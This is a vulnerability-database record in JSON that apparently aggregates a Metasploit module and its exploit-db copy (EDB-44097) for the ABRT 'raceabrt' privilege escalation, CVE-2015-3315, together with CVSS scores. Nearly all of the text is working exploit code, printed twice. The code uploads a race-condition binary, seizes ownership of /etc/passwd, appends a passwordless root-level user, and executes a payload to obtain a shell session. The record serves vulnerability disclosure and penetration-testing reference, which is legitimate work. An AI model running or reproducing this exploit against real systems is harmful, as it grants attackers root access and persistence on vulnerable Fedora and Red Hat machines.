#{abrt_version}\"\n end\n\n CheckCode::Detected\n end\n\n def upload_and_chmodx(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n cmd_exec \"chmod +x '#{path}'\"\n register_file_for_cleanup path\n end\n\n def exploit\n if check != CheckCode::Detected\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n @chown_file = '/etc/passwd'\n\n if datastore['USERNAME'].blank?\n @username = rand_text_alpha rand(7..10)\n else\n @username = datastore['USERNAME']\n end\n\n # Upload Tavis Ormandy's raceabrt exploit:\n # - https://www.exploit-db.com/exploits/36747/\n # Cross-compiled with:\n # - i486-linux-musl-cc -static raceabrt.c\n path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-3315', 'raceabrt'\n fd = ::File.open path, 'rb'\n executable_data = fd.read fd.stat.size\n fd.close\n\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\n executable_path = \"#{base_dir}/#{executable_name}\"\n upload_and_chmodx executable_path, executable_data\n\n # Change working directory to base_dir\n cmd_exec \"cd '#{base_dir}'\"\n\n # Launch raceabrt executable\n print_status \"Trying to own '#{@chown_file}' - This might take a few minutes (Timeout: #{timeout}s) ...\"\n output = cmd_exec \"#{executable_path} #{@chown_file}\", nil, timeout\n output.each_line { |line| vprint_status line.chomp }\n\n # Check if we own /etc/passwd\n unless cmd_exec(\"[ -w #{@chown_file} ] && echo true\").include? 'true'\n fail_with Failure::Unknown, \"Failed to own '#{@chown_file}'\"\n end\n\n print_good \"Success! '#{@chown_file}' is writable\"\n\n # Add new user with no password\n print_status \"Adding #{@username} user to #{@chown_file} ...\"\n cmd_exec \"echo '#{@username}::0:0::/root:/bin/bash' >> #{@chown_file}\"\n\n # Upload payload executable\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n # Execute payload executable\n vprint_status 'Executing payload...'\n cmd_exec \"/bin/bash -c \\\"echo #{payload_path} | su - #{@username}&\\\"\"\n end\n\n def on_new_session(session)\n if session.type.to_s.eql? 'meterpreter'\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\n end\n\n # Reinstate /etc/passwd root ownership and remove new user\n root_owns_passwd = false\n new_user_removed = false\n\n if session.type.to_s.eql? 'meterpreter'\n # Reinstate /etc/passwd root ownership\n session.sys.process.execute '/bin/sh', \"-c \\\"chown root:root #{@chown_file}\\\"\"\n\n # Remove new user\n session.sys.process.execute '/bin/sh', \"-c \\\"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\\\"\"\n\n # Wait for clean up\n Rex.sleep 5\n\n # Check root ownership\n passwd_stat = session.fs.file.stat(@chown_file).stathash\n if passwd_stat['st_uid'] == 0 && passwd_stat['st_gid'] == 0\n root_owns_passwd = true\n end\n\n # Check for new user in /etc/passwd\n passwd_contents = session.fs.file.open(@chown_file).read.to_s\n unless passwd_contents.include? \"#{@username}:\"\n new_user_removed = true\n end\n elsif session.type.to_s.eql? 'shell'\n # Reinstate /etc/passwd root ownership\n session.shell_command_token \"chown root:root #{@chown_file}\"\n\n # Remove new user\n session.shell_command_token \"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\"\n\n # Check root ownership\n passwd_owner = session.shell_command_token \"ls -l #{@chown_file}\"\n if passwd_owner.to_s.include? 'root'\n root_owns_passwd = true\n end\n\n # Check for new user in /etc/passwd\n passwd_user = session.shell_command_token \"grep '#{@username}:' #{@chown_file}\"\n unless passwd_user.to_s.include? \"#{@username}:\"\n new_user_removed = true\n end\n end\n\n unless root_owns_passwd\n print_warning \"Could not reinstate root ownership of #{@chown_file}\"\n end\n\n unless new_user_removed\n print_warning \"Could not remove user '#{@username}' from #{@chown_file}\"\n end\n rescue => e\n print_error \"Error during cleanup: #{e.message}\"\n ensure\n super\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-16T06:14:25", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-16T00:00:00", "type": "exploitdb", "title": "ABRT - 'raceabrt' Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2015-3315", "CVE-2015-1862", "CVE-2015-3315"], "modified": "2018-02-16T00:00:00", "id": "EDB-ID:44097", "href": "https://www.exploit-db.com/exploits/44097", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ABRT raceabrt Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to gain root privileges on Fedora systems with\r\n a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured\r\n as the crash handler.\r\n\r\n A race condition allows local users to change ownership of arbitrary\r\n files (CVE-2015-3315). This module uses a symlink attack on\r\n '/var/tmp/abrt/*/maps' to change the ownership of /etc/passwd,\r\n then adds a new user with UID=0 GID=0 to gain root privileges.\r\n Winning the race could take a few minutes.\r\n\r\n This module has been tested successfully on ABRT packaged version\r\n 2.1.5-1.fc19 on Fedora Desktop 19 x86_64, 2.2.1-1.fc19 on Fedora Desktop\r\n 19 x86_64 and 2.2.2-2.fc20 on Fedora Desktop 20 x86_64.\r\n\r\n Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Tavis Ormandy', # Discovery and C exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Apr 14 2015',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-3315' ],\r\n [ 'EDB', '36747' ],\r\n [ 'BID', '75117' ],\r\n [ 'URL', 'https://gist.github.com/taviso/fe359006836d6cd1091e' ],\r\n [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],\r\n [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/16/12' ],\r\n [ 'URL', 'https://github.com/abrt/abrt/commit/80408e9e24a1c10f85fd969e1853e0f192157f92' ],\r\n [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-1862' ],\r\n [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-3315' ],\r\n [ 'URL', 'https://access.redhat.com/articles/1415483' ],\r\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],\r\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],\r\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1218239' ]\r\n ]\r\n ))\r\n register_options(\r\n [\r\n OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '900' ]),\r\n OptString.new('USERNAME', [ false, 'Username of new UID=0 user (default: random)', '' ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ])\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir']\r\n end\r\n\r\n def timeout\r\n datastore['TIMEOUT']\r\n end\r\n\r\n def check\r\n if cmd_exec('lsattr /etc/passwd').include? 'i'\r\n vprint_error 'File /etc/passwd is immutable'\r\n return CheckCode::Safe\r\n end\r\n\r\n kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'\r\n unless kernel_core_pattern.include? 'abrt-hook-ccpp'\r\n vprint_error 'System is NOT configured to use ABRT for crash reporting'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'System is configured to use ABRT for crash reporting'\r\n\r\n if cmd_exec('[ -d /var/spool/abrt ] && echo true').include? 'true'\r\n vprint_error \"Directory '/var/spool/abrt' exists. System has been patched.\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'System does not appear to have been patched'\r\n\r\n unless cmd_exec('[ -d /var/tmp/abrt ] && echo true').include? 'true'\r\n vprint_error \"Directory '/var/tmp/abrt' does NOT exist\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Directory '/var/tmp/abrt' exists\"\r\n\r\n if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'\r\n vprint_error 'abrt-ccp service NOT running'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'abrt-ccpp service is running'\r\n\r\n abrt_version = cmd_exec('yum list installed abrt | grep abrt').split(/\\s+/)[1]\r\n unless abrt_version.blank?\r\n vprint_status \"System is using ABRT package version #{abrt_version}\"\r\n end\r\n\r\n CheckCode::Detected\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n register_file_for_cleanup path\r\n end\r\n\r\n def exploit\r\n if check != CheckCode::Detected\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n\r\n @chown_file = '/etc/passwd'\r\n\r\n if datastore['USERNAME'].blank?\r\n @username = rand_text_alpha rand(7..10)\r\n else\r\n @username = datastore['USERNAME']\r\n end\r\n\r\n # Upload Tavis Ormandy's raceabrt exploit:\r\n # - https://www.exploit-db.com/exploits/36747/\r\n # Cross-compiled with:\r\n # - i486-linux-musl-cc -static raceabrt.c\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-3315', 'raceabrt'\r\n fd = ::File.open path, 'rb'\r\n executable_data = fd.read fd.stat.size\r\n fd.close\r\n\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n upload_and_chmodx executable_path, executable_data\r\n\r\n # Change working directory to base_dir\r\n cmd_exec \"cd '#{base_dir}'\"\r\n\r\n # Launch raceabrt executable\r\n print_status \"Trying to own '#{@chown_file}' - This might take a few minutes (Timeout: #{timeout}s) ...\"\r\n output = cmd_exec \"#{executable_path} #{@chown_file}\", nil, timeout\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n # Check if we own /etc/passwd\r\n unless cmd_exec(\"[ -w #{@chown_file} ] && echo true\").include? 'true'\r\n fail_with Failure::Unknown, \"Failed to own '#{@chown_file}'\"\r\n end\r\n\r\n print_good \"Success! '#{@chown_file}' is writable\"\r\n\r\n # Add new user with no password\r\n print_status \"Adding #{@username} user to #{@chown_file} ...\"\r\n cmd_exec \"echo '#{@username}::0:0::/root:/bin/bash' >> #{@chown_file}\"\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Execute payload executable\r\n vprint_status 'Executing payload...'\r\n cmd_exec \"/bin/bash -c \\\"echo #{payload_path} | su - #{@username}&\\\"\"\r\n end\r\n\r\n def on_new_session(session)\r\n if session.type.to_s.eql? 'meterpreter'\r\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\r\n end\r\n\r\n # Reinstate /etc/passwd root ownership and remove new user\r\n root_owns_passwd = false\r\n new_user_removed = false\r\n\r\n if session.type.to_s.eql? 'meterpreter'\r\n # Reinstate /etc/passwd root ownership\r\n session.sys.process.execute '/bin/sh', \"-c \\\"chown root:root #{@chown_file}\\\"\"\r\n\r\n # Remove new user\r\n session.sys.process.execute '/bin/sh', \"-c \\\"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\\\"\"\r\n\r\n # Wait for clean up\r\n Rex.sleep 5\r\n\r\n # Check root ownership\r\n passwd_stat = session.fs.file.stat(@chown_file).stathash\r\n if passwd_stat['st_uid'] == 0 && passwd_stat['st_gid'] == 0\r\n root_owns_passwd = true\r\n end\r\n\r\n # Check for new user in /etc/passwd\r\n passwd_contents = session.fs.file.open(@chown_file).read.to_s\r\n unless passwd_contents.include? \"#{@username}:\"\r\n new_user_removed = true\r\n end\r\n elsif session.type.to_s.eql? 'shell'\r\n # Reinstate /etc/passwd root ownership\r\n session.shell_command_token \"chown root:root #{@chown_file}\"\r\n\r\n # Remove new user\r\n session.shell_command_token \"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\"\r\n\r\n # Check root ownership\r\n passwd_owner = session.shell_command_token \"ls -l #{@chown_file}\"\r\n if passwd_owner.to_s.include? 'root'\r\n root_owns_passwd = true\r\n end\r\n\r\n # Check for new user in /etc/passwd\r\n passwd_user = session.shell_command_token \"grep '#{@username}:' #{@chown_file}\"\r\n unless passwd_user.to_s.include? \"#{@username}:\"\r\n new_user_removed = true\r\n end\r\n end\r\n\r\n unless root_owns_passwd\r\n print_warning \"Could not reinstate root ownership of #{@chown_file}\"\r\n end\r\n\r\n unless new_user_removed\r\n print_warning \"Could not remove user '#{@username}' from #{@chown_file}\"\r\n end\r\n rescue => e\r\n print_error \"Error during cleanup: #{e.message}\"\r\n ensure\r\n super\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/44097", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
(RHSA-2015:1210) Moderate: abrt security update
